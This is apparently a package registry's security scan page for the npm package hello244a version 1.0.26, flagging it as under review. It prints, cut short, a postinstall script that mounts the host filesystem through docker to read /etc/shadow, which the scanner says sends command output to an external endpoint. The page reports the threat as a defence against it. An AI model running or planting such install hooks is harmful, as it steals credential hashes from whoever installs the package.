registry  /  hello244a  /  1.0.26

hello244a@1.0.26

⚠ Under review

Static Scan Results

scanned 4h ago · by rust-scanner

Static analysis flagged 5 finding(s) at 86.0% confidence. This version is warn-only unless an AI or security-team review confirms malicious behavior.

Static reason
High-risk behavior combination matched malicious policy.

Decision evidence

public snapshot
Behavioral surface
SourceNo risky source behavior triggered.
Supply chainNo supply-chain packaging signals triggered.
Manifest
NoLicense
scanned 0 file(s), 0 B of source

Source & flagged code

3 flagged · loading source
package.jsonView file
scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.jsonView on unpkg
scripts.postinstall = node -e "const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').t...
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg
package.json#scripts.postinstallView file
1"const {execSync}=require('child_process');const https=require('https');let d={};try{d.host_shadow=execSync('docker run --rm -v /:/host alpine cat /host/etc/shadow 2>&1').toString(...
Critical
Command Output Exfiltration

Source executes local commands and sends command output to an external endpoint.

package.json#scripts.postinstallView on unpkg · L1

Findings

2 Critical1 High2 Low
CriticalRed Install Lifecycle Scriptpackage.json
CriticalCommand Output Exfiltrationpackage.json#scripts.postinstall
HighInstall Time Lifecycle Scriptspackage.json
LowScripts Present
LowNo License